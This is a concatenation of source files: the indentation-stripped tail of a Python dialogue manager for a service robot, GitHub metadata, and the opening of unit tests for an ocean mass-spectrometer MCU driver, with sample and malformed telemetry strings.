self.utterances_for_goal = []
self.utterances_for_clarification = []
self.utterances_during_dialogue = {}
self.dialogue_accepted_parses = {}
#self.unmapped_words_from_utterances = []
self.vocalize("How can I help?")
#dialogue control loop continues until minimum confidence among arguments meets acceptable threshold
confident_in_understanding = False
while (confident_in_understanding == False):
#user's turn, user initiative
if (self.request_type == "user_initiative"):
user_responses,user_response_class = self.get_user_response()
best_parse_result = self.process_user_initiative_response(user_responses,user_response_class)
if (best_parse_result != None):
self.dialogue_accepted_parses["goal"] = best_parse_result
if (self.request_type == "terminate"): #user gave up in response
break
#user's turn, system initiative
elif (self.request_type == "system_initiative"):
user_responses,user_response_class = self.get_user_response()
best_parse_result = self.process_system_initiative_response(user_responses,user_response_class)
print "best_parse_result = "+str(best_parse_result)+" for role "+str(self.role_requested) #DEBUG
if (best_parse_result != None):
self.dialogue_accepted_parses[self.role_requested] = best_parse_result
if (self.request_type == "terminate"): #user rejected clarification, so we made a bad choice in what to believe
self.request_type = "user_initiative"
self.role_requested = None
self.current_best_asp_understanding = [[None,0],[None,0],[None,0]] #start fresh
self.current_asp_confidence = [{},{},{}] #start fresh
#for role in self.asp_role_map: #decay all results
# for existing_candidates in self.current_asp_confidence[self.asp_role_map[role]]:
# self.current_asp_confidence[self.asp_role_map[role]][existing_candidates] = self.current_asp_confidence[self.asp_role_map[role]][existing_candidates]*self.confidence_decay_rate
#update internal states based on user's response
for role in self.asp_role_map: #get new best understanding
max_role_conf,max_role_arg = self.max_argmax(self.current_asp_confidence[self.asp_role_map[role]])
self.current_best_asp_understanding[self.asp_role_map[role]][0] = max_role_arg
self.current_best_asp_understanding[self.asp_role_map[role]][1] = max_role_conf
sys.stderr.write("DEBUG: current best asp understanding: "+str(self.current_best_asp_understanding)+"\n")
sys.stderr.write("DEBUG: current current asp confidence: "+str(self.current_asp_confidence)+"\n")
if (min([self.current_best_asp_understanding[self.asp_role_map[role]][1] for role in self.asp_role_map]) > self.min_confidence_to_accept):
confident_in_understanding = True
break
#DEBUG
for r in self.utterances_during_dialogue:
print r+"\t"+str(self.utterances_during_dialogue[r])+"\t"+str(self.dialogue_accepted_parses[r] if r in self.dialogue_accepted_parses else None)
#/DEBUG
#system's turn
vocalize_for_user,self.roles_relatively_confident_about = self.articulate_next_state()
self.vocalize(vocalize_for_user)
#note all unmapped words found so far for which we have any alignment guesses from this dialogue
#self.update_all_unmapped_words_guesses(self.unmapped_words_from_utterances)
#terminate state reached now, so determine what response to take
if (confident_in_understanding == True):
#reconstruct best parse if it is missing from components
#NOTE: this may disrupt the parser, since the constructed parses will never involve lambda expressions; something to tune
# if (best_parse_result == None):
# if (self.current_best_asp_understanding[self.asp_role_map["action"]][0] == "query"):
# pass #the semantic parser definitely won't benefit from loading a whole expression with its lambda answer
# else:
# action_name = "bring:a" if self.current_best_asp_understanding[self.asp_role_map["action"]][0] == "served" else "walk:a"
# best_parse_result = "(and:<t*,t> (action:<a,t> "+action_name+")"
# best_parse_result += " (actionrecipient:<a,<e,t>> "+action_name+" "+self.current_best_asp_understanding[self.asp_role_map["recipient"]][0]+")"
# if (self.current_best_asp_understanding[self.asp_role_map["patient"]][0] != False):
# best_parse_result += " (actionpatient:<a,<e,t>> "+action_name+" "+self.current_best_asp_understanding[self.asp_role_map["patient"]][0]+")"
# best_parse_result += ")"
#note parse pairs induced from final, correct parse, if found, for each request type
for r in self.dialogue_accepted_parses:
if (r in self.utterances_during_dialogue):
for utterance in self.utterances_during_dialogue[r]:
self.utterance_parse_pairs.append([utterance,self.dialogue_accepted_parses[r]])
sys.stderr.write("DEBUG: utterance_parse_pairs adding pair '"+utterance+"'->'"+self.dialogue_accepted_parses[r]+"'\n")
#return the asp goal state generated
if (self.current_best_asp_understanding[self.asp_role_map["action"]][0] == "query"):
patient_ref = self.choose_referring_expression(self.current_best_asp_understanding[self.asp_role_map["patient"]][0],self.utterances_for_goal[-1])
self.vocalize(patient_ref)
else:
self.request_type = None
self.role_requested = None
self.vocalize("Happy to help")
f = open(self.log_filename,'a')
f.write("\n")
f.close()
#apr_tuple_to_write_goal_from = {role:self.current_best_asp_understanding[self.asp_role_map[role]][0] for role in self.asp_role_map}
apr_tuple_to_write_goal_from = {}
for role in self.asp_role_map:
apr_tuple_to_write_goal_from[role] = self.current_best_asp_understanding[self.asp_role_map[role]][0]
return self.write_asp_goal_from_apr_tuple(apr_tuple_to_write_goal_from)
else:
self.vocalize("Sorry I couldn't understand.")
f = open(self.log_filename,'a')
f.write("\n")
f.close()
return None
#generate a (series) of utterances in response to last user utterance contained in poll file, or start new dialogue
def get_command_from_user_offline(self):
#check for existing state pickle to decide whether this is the first call for the session
try:
f = open(self.core_filename,'rb')
starting = False
f.close()
except IOError:
starting = True
#first call
if (starting == True):
#greeting state
self.current_best_asp_understanding = [[None,0],[None,0],[None,0]]
self.current_asp_confidence = [{},{},{}]
self.request_type = "user_initiative"
self.role_requested = None
self.utterances_for_goal = []
self.utterances_for_clarification = []
self.utterances_during_dialogue = {}
self.dialogue_accepted_parses = {}
self.vocalize("How can I help?")
self.write_core_elements_to_pickle_and_shutdown()
#subsequent call; load data and process response
else:
#load dialogue state
self.load_core_elements_from_pickle()
#get user response
user_responses,user_response_class = self.get_user_response()
#dialogue control loop continues until minimum confidence among arguments meets acceptable threshold
confident_in_understanding = False
#user's turn, user initiative
if (self.request_type == "user_initiative"):
best_parse_result = self.process_user_initiative_response(user_responses,user_response_class)
if (best_parse_result != None):
self.dialogue_accepted_parses["goal"] = best_parse_result
if (self.request_type == "terminate"): #user gave up in response
self.vocalize("Sorry I couldn't understand.")
return False
#user's turn, system initiative
elif (self.request_type == "system_initiative"):
best_parse_result = self.process_system_initiative_response(user_responses,user_response_class)
print "best_parse_result = "+str(best_parse_result)+" for role "+str(self.role_requested) #DEBUG
if (best_parse_result != None):
self.dialogue_accepted_parses[self.role_requested] = best_parse_result
if (self.request_type == "terminate"): #user rejected clarification, so we made a bad choice in what to believe
self.request_type = "user_initiative"
self.role_requested = None
self.current_best_asp_understanding = [[None,0],[None,0],[None,0]] #start fresh
self.current_asp_confidence = [{},{},{}] #start fresh
#for role in self.asp_role_map: #decay all results
# for existing_candidates in self.current_asp_confidence[self.asp_role_map[role]]:
# self.current_asp_confidence[self.asp_role_map[role]][existing_candidates] = self.current_asp_confidence[self.asp_role_map[role]][existing_candidates]*self.confidence_decay_rate
#update internal states based on user's response
for role in self.asp_role_map: #get new best understanding
max_role_conf,max_role_arg = self.max_argmax(self.current_asp_confidence[self.asp_role_map[role]])
self.current_best_asp_understanding[self.asp_role_map[role]][0] = max_role_arg
self.current_best_asp_understanding[self.asp_role_map[role]][1] = max_role_conf
if (min([self.current_best_asp_understanding[self.asp_role_map[role]][1] for role in self.asp_role_map]) > self.min_confidence_to_accept):
confident_in_understanding = True
if (confident_in_understanding == False):
#system's turn
vocalize_for_user,self.roles_relatively_confident_about = self.articulate_next_state()
self.vocalize(vocalize_for_user)
self.write_core_elements_to_pickle_and_shutdown()
else:
#log parse pairs induced from final, correct parse, if found, for each request type
f = open(self.alog_filename,'a')
for r in self.dialogue_accepted_parses:
if (r in self.utterances_during_dialogue):
for utterance in self.utterances_during_dialogue[r]:
f.write(utterance+"\n"+self.dialogue_accepted_parses[r]+"\n\n")
f.close()
#return the asp goal state generated
if (self.current_best_asp_understanding[self.asp_role_map["action"]][0] == "query"):
patient_ref = self.choose_referring_expression(self.current_best_asp_understanding[self.asp_role_map["patient"]][0],self.utterances_for_goal[-1])
self.request_type = None
self.role_requested = None
self.vocalize(patient_ref)
self.vocalize("Happy to help")
else:
self.request_type = None
self.role_requested = None
self.vocalize("Happy to help")
f = open(self.log_filename,'a')
f.write("\n")
f.close()
#apr_tuple_to_write_goal_from = {role:self.current_best_asp_understanding[self.asp_role_map[role]][0] for role in self.asp_role_map}
apr_tuple_to_write_goal_from = {}
for role in self.asp_role_map:
apr_tuple_to_write_goal_from[role] = self.current_best_asp_understanding[self.asp_role_map[role]][0]
return self.write_asp_goal_from_apr_tuple(apr_tuple_to_write_goal_from)
|
{
"content_hash": "1d9bfeb0c6793b265ccccf8a97a78cff",
"timestamp": "",
"source": "github",
"line_count": 993,
"max_line_length": 333,
"avg_line_length": 53.066465256797585,
"alnum_prop": 0.7088338552044786,
"repo_name": "pato/bwi_experimental",
"id": "be4d8b3b8c4d7036fed725782f3fad72be9368c9",
"size": "52695",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "bwi_rlg/agent/dialog/dialogue_manager.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Assembly",
"bytes": "605"
},
{
"name": "C",
"bytes": "117"
},
{
"name": "C++",
"bytes": "351808"
},
{
"name": "CMake",
"bytes": "11337"
},
{
"name": "CSS",
"bytes": "63380"
},
{
"name": "HTML",
"bytes": "2128397"
},
{
"name": "JavaScript",
"bytes": "86908"
},
{
"name": "Lex",
"bytes": "6253"
},
{
"name": "PHP",
"bytes": "2605"
},
{
"name": "Python",
"bytes": "107798"
},
{
"name": "Yacc",
"bytes": "2976"
}
],
"symlink_target": ""
}
|
"""
@package mi.instrument.harvard.massp.mcu.test.test_driver
@file marine-integrations/mi/instrument/harvard/massp/mcu/driver.py
@author Peter Cable
@brief Test cases for mcu driver
USAGE:
Make tests verbose and provide stdout
* From the IDK
$ bin/test_driver
$ bin/test_driver -u [-t testname]
$ bin/test_driver -i [-t testname]
$ bin/test_driver -q [-t testname]
"""
import time
from nose.plugins.attrib import attr
from mock import Mock
import ntplib
from mi.core.exceptions import SampleException, InstrumentCommandException
from mi.core.instrument.data_particle import RawDataParticle
from mi.core.instrument.port_agent_client import PortAgentPacket
from mi.core.log import get_logger
from mi.idk.unit_test import InstrumentDriverTestCase, ParameterTestConfigKey, AgentCapabilityType
from mi.idk.unit_test import InstrumentDriverUnitTestCase
from mi.idk.unit_test import InstrumentDriverIntegrationTestCase
from mi.idk.unit_test import InstrumentDriverQualificationTestCase
from mi.idk.unit_test import DriverTestMixin
from mi.core.instrument.instrument_driver import DriverConfigKey, ResourceAgentState, DriverProtocolState
from mi.core.instrument.chunker import StringChunker
from mi.instrument.harvard.massp.mcu.driver import InstrumentDriver
from mi.instrument.harvard.massp.mcu.driver import McuStatusParticleKey
from mi.instrument.harvard.massp.mcu.driver import DataParticleType
from mi.instrument.harvard.massp.mcu.driver import InstrumentCommand
from mi.instrument.harvard.massp.mcu.driver import ProtocolState
from mi.instrument.harvard.massp.mcu.driver import ProtocolEvent
from mi.instrument.harvard.massp.mcu.driver import Capability
from mi.instrument.harvard.massp.mcu.driver import Parameter
from mi.instrument.harvard.massp.mcu.driver import ParameterConstraint
from mi.instrument.harvard.massp.mcu.driver import Protocol
from mi.instrument.harvard.massp.mcu.driver import Prompt
from mi.instrument.harvard.massp.mcu.driver import NEWLINE
__author__ = 'Peter Cable'
__license__ = 'Apache 2.0'
log = get_logger()
mcu_startup_config = {DriverConfigKey.PARAMETERS: {
Parameter.TELEGRAM_INTERVAL: 10000,
Parameter.ONE_MINUTE: 1000,
Parameter.SAMPLE_TIME: 10
}}
###
# Driver parameters for the tests
###
InstrumentDriverTestCase.initialize(
driver_module='mi.instrument.harvard.massp.mcu.driver',
driver_class="InstrumentDriver",
instrument_agent_resource_id='IN2N03',
instrument_agent_name='harvard_massp_mcu',
instrument_agent_packet_config=DataParticleType(),
driver_startup_config=mcu_startup_config
)
#################################### RULES ####################################
# #
# Common capabilities in the base class #
# #
# Instrument specific stuff in the derived class #
# #
# Generator spits out either stubs or comments describing test this here, #
# test that there. #
# #
# Qualification tests are driven through the instrument_agent #
# #
###############################################################################
###
# Driver constant definitions
###
TELEGRAM_1 = 'DATA,POW:0:1:2:3:4:5:6:7:8:9:10,' + \
'PRE:1:2:3:4,' + \
'INT:1:2:3:4:5:6:7:8:9:10,' + \
'EXT:1:2:3,' + \
'EXTST:1:2:3,' + \
'POWST:0:1:2:3:4:5:6:7:8:9:10:11:12,' + \
'SOLST:1:2:3:4:5:6,' + \
'CAL:0:1:2:3:4:1:2:3:4,' + \
'HEAT:0:1:2:3:4:5:6:7:8:9,' + \
'ENDDATA'
TELEGRAM_2 = 'DATA,POW:4967:4983:1994:4978:4978:4973:1998:5124:2003:4994:6794,' + \
'PRE:955:938:957:955,' + \
'INT:50:35:17:20:20:21:20:20:20:20:20,' + \
'EXT:2.00:0.00:-1.00,' + \
'EXTST:1:0:0,' + \
'POWST:0:0:0:0:1:0:0:0:0:0:0:0:0,' + \
'SOLST:0:0:0:1:0:0,' + \
'CAL:0:0:0:0:0:10:10:1:0,' + \
'HEAT:0:0:0:20:0:-1:-1:-1:-1:-1,' + \
'ENDDATA'
# missing all data
BAD_TELEGRAM_1 = 'DATA,ENDDATA'
# non-integer value
BAD_TELEGRAM_2 = 'DATA,POW:a:1:2:3:4:5:6:7:8:9:10,' + \
'PRE:1:2:3:4,' + \
'INT:1:2:3:4:5:6:7:8:9:10,' + \
'EXT:1:2:3,' + \
'EXTST:1:2:3,' + \
'POWST:0:1:2:3:4:5:6:7:8:9:10:11:12,' + \
'SOLST:1:2:3:4:5:6,' + \
'CAL:0:1:2:3:4:1:2:3:4,' + \
'HEAT:0:1:2:3:4:5:6:7:8:9,' + \
'ENDDATA'
# missing one value
BAD_TELEGRAM_3 = 'DATA,POW:0:1:2:3:4:5:6:7:8:9,' + \
'PRE:1:2:3:4,' + \
'INT:1:2:3:4:5:6:7:8:9:10,' + \
'EXT:1:2:3,' + \
'EXTST:1:2:3,' + \
'POWST:0:1:2:3:4:5:6:7:8:9:10:11:12,' + \
'SOLST:1:2:3:4:5:6,' + \
'CAL:0:1:2:3:4:1:2:3:4,' + \
'HEAT:0:1:2:3:4:5:6:7:8:9,' + \
'ENDDATA'
###############################################################################
# DRIVER TEST MIXIN #
# Defines a set of constants and assert methods used for data particle #
# verification #
# #
# In python mixin classes are classes designed such that they wouldn't be #
# able to stand on their own, but are inherited by other classes generally #
# using multiple inheritance. #
# #
# This class defines a configuration structure for testing and common assert #
# methods for validating data particles. #
###############################################################################
# noinspection PyProtectedMember
class DriverTestMixinSub(DriverTestMixin):
# Create some short names for the parameter test config
TYPE = ParameterTestConfigKey.TYPE
READONLY = ParameterTestConfigKey.READONLY
STARTUP = ParameterTestConfigKey.STARTUP
DA = ParameterTestConfigKey.DIRECT_ACCESS
VALUE = ParameterTestConfigKey.VALUE
REQUIRED = ParameterTestConfigKey.REQUIRED
DEFAULT = ParameterTestConfigKey.DEFAULT
STATES = ParameterTestConfigKey.STATES
def assert_sample_data_particle(self, data_particle):
"""
Verify a particle is a know particle to this driver and verify the particle is correct
@param data_particle: Data particle of unknown type produced by the driver
"""
if isinstance(data_particle, RawDataParticle):
self.assert_particle_raw(data_particle)
else:
self.fail("Unknown particle detected: %s" % data_particle)
def assert_particle_exception(self, driver, sample_data):
"""
Verify that we can send data through the port agent and the the correct particles are generated.
Create a port agent packet, send it through got_data, then finally grab the data particle
from the data particle queue and verify it using the passed in assert method.
@param driver: instrument driver with mock port agent client
@param sample_data: the byte string we want to send to the driver
"""
try:
# Push the data into the driver
self._send_port_agent_packet(driver, sample_data)
# uh oh, we shouldn't have reached this point
self.fail('Failed to generate an exception when given bad data!')
except SampleException, e:
log.debug('Caught sample exception: %r', e)
def _send_port_agent_packet(self, driver, data):
"""
Send a port agent packet via got_data
@param driver Instrument Driver instance
@param data data to send
"""
ts = ntplib.system_to_ntp_time(time.time())
port_agent_packet = PortAgentPacket()
port_agent_packet.attach_data(data)
port_agent_packet.attach_timestamp(ts)
port_agent_packet.pack_header()
# Push the response into the driver
driver._protocol.got_data(port_agent_packet)
def my_send(self, driver):
"""
Side effect function generator - will send responses based on input
@param driver Instrument driver instance
@returns side effect function
"""
def inner(data):
"""
Inner function for side effect generator
@param data Data to send
@returns length of response
"""
my_response = self.responses.get(data.strip())
log.debug("my_send: data: %r, my_response: %r", data, my_response)
if my_response is not None:
self._send_port_agent_packet(driver, my_response + NEWLINE)
return len(my_response)
return inner
responses = {
InstrumentCommand.START1: Prompt.OK,
InstrumentCommand.START2: Prompt.OK,
InstrumentCommand.SAMPLE + '10': Prompt.SAMPLE_START,
InstrumentCommand.CAL: Prompt.OK,
# instrument only sends one or the other (STANDBY or ONLINE) but for testing we can send both
InstrumentCommand.STANDBY: Prompt.OK + NEWLINE + Prompt.STANDBY + NEWLINE + Prompt.ONLINE,
InstrumentCommand.BEAT: Prompt.BEAT,
InstrumentCommand.NAFREG: Prompt.OK,
InstrumentCommand.IONREG: Prompt.OK,
InstrumentCommand.SET_TELEGRAM_INTERVAL + '00010000': Prompt.OK,
InstrumentCommand.SET_MINUTE + '01000': Prompt.SET_MINUTE,
InstrumentCommand.SET_WATCHDOG: Prompt.OK,
}
_driver_parameters = {
Parameter.TELEGRAM_INTERVAL: {TYPE: int, READONLY: False, DA: False, STARTUP: True, VALUE: 10000},
Parameter.ONE_MINUTE: {TYPE: int, READONLY: True, DA: False, STARTUP: True, VALUE: 1000},
Parameter.SAMPLE_TIME: {TYPE: int, READONLY: False, DA: False, STARTUP: True, VALUE: 10},
Parameter.ERROR_REASON: {TYPE: str, READONLY: True, DA: False, STARTUP: False, VALUE: ''},
}
_driver_capabilities = {
# capabilities defined in the IOS
Capability.DISCOVER: {STATES: [ProtocolState.UNKNOWN]},
Capability.START1: {STATES: [ProtocolState.COMMAND]},
Capability.START2: {STATES: [ProtocolState.START1]},
Capability.SAMPLE: {STATES: [ProtocolState.WAITING_RGA]},
Capability.STANDBY: {STATES: [ProtocolState.WAITING_TURBO, ProtocolState.WAITING_RGA,
ProtocolState.SAMPLE, ProtocolState.REGEN]},
Capability.CLEAR: {STATES: [ProtocolState.ERROR]},
Capability.IONREG: {STATES: [ProtocolState.COMMAND]},
Capability.NAFREG: {STATES: [ProtocolState.COMMAND]},
Capability.POWEROFF: {STATES: [ProtocolState.COMMAND]},
Capability.CALIBRATE: {STATES: [ProtocolState.WAITING_RGA]},
}
_capabilities = {
ProtocolState.UNKNOWN: ['DRIVER_EVENT_DISCOVER',
'PROTOCOL_EVENT_ERROR'],
ProtocolState.COMMAND: ['DRIVER_EVENT_GET',
'DRIVER_EVENT_SET',
'PROTOCOL_EVENT_ERROR',
'PROTOCOL_EVENT_POWEROFF',
'DRIVER_EVENT_START_DIRECT',
'PROTOCOL_EVENT_NAFREG',
'PROTOCOL_EVENT_IONREG',
'PROTOCOL_EVENT_START1'],
ProtocolState.START1: ['PROTOCOL_EVENT_START1_COMPLETE',
'PROTOCOL_EVENT_STANDBY',
'PROTOCOL_EVENT_ERROR'],
ProtocolState.START2: ['PROTOCOL_EVENT_START2_COMPLETE',
'PROTOCOL_EVENT_STANDBY',
'PROTOCOL_EVENT_ERROR'],
ProtocolState.SAMPLE: ['PROTOCOL_EVENT_SAMPLE_COMPLETE',
'PROTOCOL_EVENT_STANDBY',
'PROTOCOL_EVENT_ERROR'],
ProtocolState.CALIBRATE: ['PROTOCOL_EVENT_CALIBRATE_COMPLETE',
'PROTOCOL_EVENT_STANDBY',
'PROTOCOL_EVENT_ERROR'],
ProtocolState.REGEN: ['PROTOCOL_EVENT_STANDBY', 'PROTOCOL_EVENT_ERROR'],
ProtocolState.STOPPING: ['PROTOCOL_EVENT_STANDBY',
'PROTOCOL_EVENT_ERROR'],
ProtocolState.WAITING_RGA: ['PROTOCOL_EVENT_SAMPLE',
'PROTOCOL_EVENT_STANDBY',
'DRIVER_EVENT_CALIBRATE',
'PROTOCOL_EVENT_ERROR'],
ProtocolState.WAITING_TURBO: ['PROTOCOL_EVENT_START2',
'PROTOCOL_EVENT_STANDBY',
'PROTOCOL_EVENT_ERROR'],
ProtocolState.DIRECT_ACCESS: ['DRIVER_EVENT_STOP_DIRECT', 'EXECUTE_DIRECT'],
ProtocolState.ERROR: ['PROTOCOL_EVENT_CLEAR',
'PROTOCOL_EVENT_STANDBY']
}
"""
'DATA,POW:4967:4983:1994:4978:4978:4973:1998:5124:2003:4994:6794,' + \
'PRE:955:938:957:955,' + \
'INT:50:35:17:20:20:21:20:20:20:20:20,' + \
'EXT:2.00:0.00:-1.00,' + \
'EXTST:1:0:0,' + \
'POWST:0:0:0:0:1:0:0:0:0:0:0:0:0,' + \
'SOLST:0:0:0:1:0:0,' + \
'CAL:0:0:0:0:0:10:10:1:0,' + \
'HEAT:0:0:0:20:0:-1:-1:-1:-1:-1,' + \
'ENDDATA'
"""
_status_parameters = {
McuStatusParticleKey.RGA_CURRENT: {TYPE: int, VALUE: 4967, REQUIRED: True},
McuStatusParticleKey.TURBO_CURRENT: {TYPE: int, VALUE: 4983, REQUIRED: True},
McuStatusParticleKey.HEATER_CURRENT: {TYPE: int, VALUE: 1994, REQUIRED: True},
McuStatusParticleKey.ROUGHING_CURRENT: {TYPE: int, VALUE: 4978, REQUIRED: True},
McuStatusParticleKey.FAN_CURRENT: {TYPE: int, VALUE: 4978, REQUIRED: True},
McuStatusParticleKey.SBE_CURRENT: {TYPE: int, VALUE: 4973, REQUIRED: True},
McuStatusParticleKey.CONVERTER_24V_MAIN: {TYPE: int, VALUE: 1998, REQUIRED: True},
McuStatusParticleKey.CONVERTER_12V_MAIN: {TYPE: int, VALUE: 5124, REQUIRED: True},
McuStatusParticleKey.CONVERTER_24V_SEC: {TYPE: int, VALUE: 2003, REQUIRED: True},
McuStatusParticleKey.CONVERTER_12V_SEC: {TYPE: int, VALUE: 4994, REQUIRED: True},
McuStatusParticleKey.VALVE_CURRENT: {TYPE: int, VALUE: 6794, REQUIRED: True},
McuStatusParticleKey.PRESSURE_P1: {TYPE: int, VALUE: 955, REQUIRED: True},
McuStatusParticleKey.PRESSURE_P2: {TYPE: int, VALUE: 938, REQUIRED: True},
McuStatusParticleKey.PRESSURE_P3: {TYPE: int, VALUE: 957, REQUIRED: True},
McuStatusParticleKey.PRESSURE_P4: {TYPE: int, VALUE: 955, REQUIRED: True},
McuStatusParticleKey.HOUSING_PRESSURE: {TYPE: int, VALUE: 50, REQUIRED: True},
McuStatusParticleKey.HOUSING_HUMIDITY: {TYPE: int, VALUE: 35, REQUIRED: True},
McuStatusParticleKey.TEMP_MAIN_CONTROL: {TYPE: int, VALUE: 17, REQUIRED: True},
McuStatusParticleKey.TEMP_MAIN_ROUGH: {TYPE: int, VALUE: 20, REQUIRED: True},
McuStatusParticleKey.TEMP_SEC_ROUGH: {TYPE: int, VALUE: 20, REQUIRED: True},
McuStatusParticleKey.TEMP_MAIN_24V: {TYPE: int, VALUE: 21, REQUIRED: True},
McuStatusParticleKey.TEMP_SEC_24V: {TYPE: int, VALUE: 20, REQUIRED: True},
McuStatusParticleKey.TEMP_ANALYZER: {TYPE: int, VALUE: 20, REQUIRED: True},
McuStatusParticleKey.TEMP_NAFION: {TYPE: int, VALUE: 20, REQUIRED: True},
McuStatusParticleKey.TEMP_ION: {TYPE: int, VALUE: 20, REQUIRED: True},
McuStatusParticleKey.PH_METER: {TYPE: int, VALUE: 2, REQUIRED: True},
McuStatusParticleKey.INLET_TEMP: {TYPE: int, VALUE: 0, REQUIRED: True},
McuStatusParticleKey.PH_STATUS: {TYPE: int, VALUE: 1, REQUIRED: True},
McuStatusParticleKey.INLET_TEMP_STATUS: {TYPE: int, VALUE: 0, REQUIRED: True},
McuStatusParticleKey.POWER_RELAY_TURBO: {TYPE: int, VALUE: 0, REQUIRED: True},
McuStatusParticleKey.POWER_RELAY_RGA: {TYPE: int, VALUE: 0, REQUIRED: True},
McuStatusParticleKey.POWER_RELAY_MAIN_ROUGH: {TYPE: int, VALUE: 0, REQUIRED: True},
McuStatusParticleKey.POWER_RELAY_SEC_ROUGH: {TYPE: int, VALUE: 0, REQUIRED: True},
McuStatusParticleKey.POWER_RELAY_FAN1: {TYPE: int, VALUE: 1, REQUIRED: True},
McuStatusParticleKey.POWER_RELAY_FAN2: {TYPE: int, VALUE: 0, REQUIRED: True},
McuStatusParticleKey.POWER_RELAY_FAN3: {TYPE: int, VALUE: 0, REQUIRED: True},
McuStatusParticleKey.POWER_RELAY_FAN4: {TYPE: int, VALUE: 0, REQUIRED: True},
McuStatusParticleKey.POWER_RELAY_AUX2: {TYPE: int, VALUE: 0, REQUIRED: True},
McuStatusParticleKey.POWER_RELAY_PH: {TYPE: int, VALUE: 0, REQUIRED: True},
McuStatusParticleKey.POWER_RELAY_PUMP: {TYPE: int, VALUE: 0, REQUIRED: True},
McuStatusParticleKey.POWER_RELAY_HEATERS: {TYPE: int, VALUE: 0, REQUIRED: True},
McuStatusParticleKey.POWER_RELAY_AUX1: {TYPE: int, VALUE: 0, REQUIRED: True},
McuStatusParticleKey.SAMPLE_VALVE1: {TYPE: int, VALUE: 0, REQUIRED: True},
McuStatusParticleKey.SAMPLE_VALVE2: {TYPE: int, VALUE: 0, REQUIRED: True},
McuStatusParticleKey.SAMPLE_VALVE3: {TYPE: int, VALUE: 0, REQUIRED: True},
McuStatusParticleKey.SAMPLE_VALVE4: {TYPE: int, VALUE: 1, REQUIRED: True},
McuStatusParticleKey.GROUND_RELAY_STATUS: {TYPE: int, VALUE: 0, REQUIRED: True},
McuStatusParticleKey.EXTERNAL_VALVE1_STATUS: {TYPE: int, VALUE: 0, REQUIRED: True},
McuStatusParticleKey.EXTERNAL_VALVE2_STATUS: {TYPE: int, VALUE: 0, REQUIRED: True},
McuStatusParticleKey.EXTERNAL_VALVE3_STATUS: {TYPE: int, VALUE: 0, REQUIRED: True},
McuStatusParticleKey.EXTERNAL_VALVE4_STATUS: {TYPE: int, VALUE: 0, REQUIRED: True},
McuStatusParticleKey.CAL_BAG1_MINUTES: {TYPE: int, VALUE: 10, REQUIRED: True},
McuStatusParticleKey.CAL_BAG2_MINUTES: {TYPE: int, VALUE: 10, REQUIRED: True},
McuStatusParticleKey.CAL_BAG3_MINUTES: {TYPE: int, VALUE: 1, REQUIRED: True},
McuStatusParticleKey.NAFION_HEATER_STATUS: {TYPE: int, VALUE: 0, REQUIRED: True},
McuStatusParticleKey.NAFION_HEATER1_POWER: {TYPE: int, VALUE: 0, REQUIRED: True},
McuStatusParticleKey.NAFION_HEATER2_POWER: {TYPE: int, VALUE: 0, REQUIRED: True},
McuStatusParticleKey.NAFION_CORE_TEMP: {TYPE: int, VALUE: 20, REQUIRED: True},
McuStatusParticleKey.NAFION_ELAPSED_TIME: {TYPE: int, VALUE: 0, REQUIRED: True},
McuStatusParticleKey.ION_CHAMBER_STATUS: {TYPE: int, VALUE: -1, REQUIRED: True},
McuStatusParticleKey.ION_CHAMBER_HEATER1_STATUS: {TYPE: int, VALUE: -1, REQUIRED: True},
McuStatusParticleKey.ION_CHAMBER_HEATER2_STATUS: {TYPE: int, VALUE: -1, REQUIRED: True},
}
def assert_mcu_status_particle(self, particle, verify_values=False):
self.assert_data_particle_keys(McuStatusParticleKey, self._status_parameters)
self.assert_data_particle_header(particle, DataParticleType.MCU_STATUS)
self.assert_data_particle_parameters(particle, self._status_parameters, verify_values)
###############################################################################
# UNIT TESTS #
# Unit tests test the method calls and parameters using Mock. #
# #
# These tests are especially useful for testing parsers and other data #
# handling. The tests generally focus on small segments of code, like a #
# single function call, but more complex code using Mock objects. However #
# if you find yourself mocking too much maybe it is better as an #
# integration test. #
# #
# Unit tests do not start up external processes like the port agent or #
# driver process. #
###############################################################################
# noinspection PyProtectedMember
@attr('UNIT', group='mi')
class DriverUnitTest(InstrumentDriverUnitTestCase, DriverTestMixinSub):
def setUp(self):
InstrumentDriverUnitTestCase.setUp(self)
def test_connect(self, initial_protocol_state=ProtocolState.COMMAND):
"""
Verify driver can transition to the COMMAND state
@param initial_protocol_state Desired initial protocol state
@returns driver
"""
driver = InstrumentDriver(self._got_data_event_callback)
self.assert_initialize_driver(driver, initial_protocol_state)
log.debug('Adding Mock side effect to connection.send')
driver._connection.send.side_effect = self.my_send(driver)
driver._protocol.set_init_params(mcu_startup_config)
driver._protocol._init_params()
return driver
def test_driver_enums(self):
"""
Verify that all driver enumeration has no duplicate values that might cause confusion. Also
do a little extra validation for the Capabilities
"""
self.assert_enum_has_no_duplicates(DataParticleType)
self.assert_enum_has_no_duplicates(ProtocolState)
self.assert_enum_has_no_duplicates(ProtocolEvent)
self.assert_enum_has_no_duplicates(Parameter)
self.assert_enum_has_no_duplicates(InstrumentCommand)
self.assert_enum_has_no_duplicates(Prompt)
# Test capabilities for duplicates, them verify that capabilities is a subset of protocol events
self.assert_enum_has_no_duplicates(Capability)
self.assert_enum_complete(Capability, ProtocolEvent)
def test_capabilities(self):
"""
Verify the FSM reports capabilities as expected. All states defined in this dict must
also be defined in the protocol FSM.
"""
driver = InstrumentDriver(self._got_data_event_callback)
self.assert_capabilities(driver, self._capabilities)
def test_chunker(self):
"""
Test the chunker
"""
chunker = StringChunker(Protocol.sieve_function)
chunks = [TELEGRAM_1]
for chunk in chunks:
self.assert_chunker_sample(chunker, chunk + NEWLINE)
self.assert_chunker_fragmented_sample(chunker, chunk + NEWLINE)
self.assert_chunker_sample_with_noise(chunker, chunk + NEWLINE)
self.assert_chunker_combined_sample(chunker, chunk + NEWLINE)
def test_got_data(self):
"""
Verify sample data passed through the got data method produces the correct data particles
"""
driver = self.test_connect()
test_data = [
(TELEGRAM_1, True, False),
(TELEGRAM_2, True, True),
(BAD_TELEGRAM_1, False, False),
(BAD_TELEGRAM_2, False, False),
(BAD_TELEGRAM_3, False, False),
]
for sample, is_valid, verify in test_data:
if is_valid:
self.assert_particle_published(driver, sample + NEWLINE, self.assert_mcu_status_particle, verify)
else:
self.assert_particle_exception(driver, sample + NEWLINE)
def test_sample_sequence(self):
"""
Test the MCU ASAMPLE sequence handling
"""
driver = self.test_connect()
driver._protocol._protocol_fsm.on_event(ProtocolEvent.START1)
